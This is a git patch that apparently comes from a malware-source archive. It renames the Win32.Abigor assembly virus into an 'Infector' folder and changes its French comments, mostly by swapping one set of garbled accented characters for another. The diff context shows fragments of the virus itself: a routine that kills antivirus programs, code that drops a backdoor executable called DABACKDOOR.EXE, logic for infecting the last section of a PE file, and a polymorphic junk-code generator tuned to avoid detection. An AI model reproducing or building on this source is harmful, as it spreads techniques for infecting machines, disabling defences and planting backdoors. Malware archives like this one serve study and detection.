From 7eaec4c565cc10f81a671e66eda8435f389eb352 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Wed, 28 Oct 2020 23:13:34 -0500 Subject: [PATCH] Rename Win32/Win32.Abigor.ASM to Win32/Infector/Win32.Abigor.ASM --- Win32/{ => Infector}/Win32.Abigor.ASM | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) rename Win32/{ => Infector}/Win32.Abigor.ASM (96%) diff --git a/Win32/Win32.Abigor.ASM b/Win32/Infector/Win32.Abigor.ASM similarity index 96% rename from Win32/Win32.Abigor.ASM rename to Win32/Infector/Win32.Abigor.ASM index 1f53960..517282a 100644 --- a/Win32/Win32.Abigor.ASM +++ b/Win32/Infector/Win32.Abigor.ASM @@ -368,7 +368,7 @@ assume fs:nothing - CAll KillAVz ; aprčs que TIME_DROP soit dépassé detruire les AVs + CAll KillAVz ; après que TIME_DROP soit dÊpassÊ detruire les AVs lea eax, dword ptr [ebp + TS_Win] push eax @@ -376,7 +376,7 @@ assume fs:nothing lea eax, dword ptr [ebp + szFindWindowA] Call U32Api or eax, eax - jnz no_drop ; Backdoor déjā implanté sur notre systčme ? + jnz no_drop ; Backdoor dÊjà implantÊ sur notre système ? Call Drop_BackDoor ; non ??? implantons !! @@ -2733,7 +2733,7 @@ Backdoor db "DABACKDOOR.EXE",0 inc byte ptr [ebp+InfectionCtr] - add eax,dword ptr [ebp + pMap] ;eax pointe sur le début de la derniere section + add eax,dword ptr [ebp + pMap] ;eax pointe sur le dÊbut de la derniere section add eax,dword ptr [ebp + SizeRelative] ;eax pointe sur la fin de la derniere section mov edi, eax @@ -3999,7 +3999,7 @@ Make_Random_Blk proc uses ecx ebx edx esi Call Push_Pop_blk .ELSEIF eax == 11 Call MediumBlk - .ELSEIF eax > 12 && eax <= 16 ; (trop de détection si ce facteur est trop élevé.) + .ELSEIF eax > 12 && eax <= 16 ; (trop de dÊtection si ce facteur est trop ÊlevÊ.) Call Branch_blk .ELSEIF eax == 17 Call MemAccess_blk @@ -4579,7 +4579,7 @@ SkipDirectCMP: jmp @Method2 @Method1: mov ebx,dword ptr [_LoopOFS] - sub ebx,edi ; adresse oų sauter + sub ebx,edi ; adresse oÚ sauter xor eax,eax @@ -4678,7 +4678,7 @@ SkipDirectCMP: push ebx mov edx, edi mov ebx,dword ptr [_LoopOFS] - sub ebx,edi ; adresse oų sauter + sub ebx,edi ; adresse oÚ sauter CALL GEN_JMP_OFS sub edx, edi neg edx @@ -5594,7 +5594,7 @@ ModifyKey proc uses ecx ebx edx ModifyKey endp -;ModifyReg proc uses edx ebx ; Modifie n'importe quel registre puis le restaure (meme un registre réservé) +;ModifyReg proc uses edx ebx ; Modifie n'importe quel registre puis le restaure (meme un registre rÊservÊ) ; Call Get2RandRegs ; mov ch, cl @@ -6225,7 +6225,7 @@ InstrTBL dd OFFSET GEN_ADD_REG32_IMM;--- ;dd OFFSET GEN_ONEBYTE - ;dd OFFSET GEN_IMUL_REG32 ; enlevé : change la valeur de EDX + ;dd OFFSET GEN_IMUL_REG32 ; enlevÊ : change la valeur de EDX ;dd OFFSET GEN_MUL_REG32 dd OFFSET GEN_INC_REG8 @@ -6242,7 +6242,7 @@ MEMSTART equ $ dd OFFSET GEN_LEA_REG32_DISP32 dd OFFSET GEN_XADD_REG32_REG32 - dd OFFSET GEN_XCHG_REG32_REG32 ; Ne pas déplacer / do not move this one + dd OFFSET GEN_XCHG_REG32_REG32 ; Ne pas dÊplacer / do not move this one MEMEND equ $ MEMSTARTNBR = (($ - OFFSET InstrTBL) / 4 ) - (( MEMEND - OFFSET MEMSTART) / 4) TOTALNBR = (OFFSET $ - OFFSET InstrTBL) / 4 -- GitLab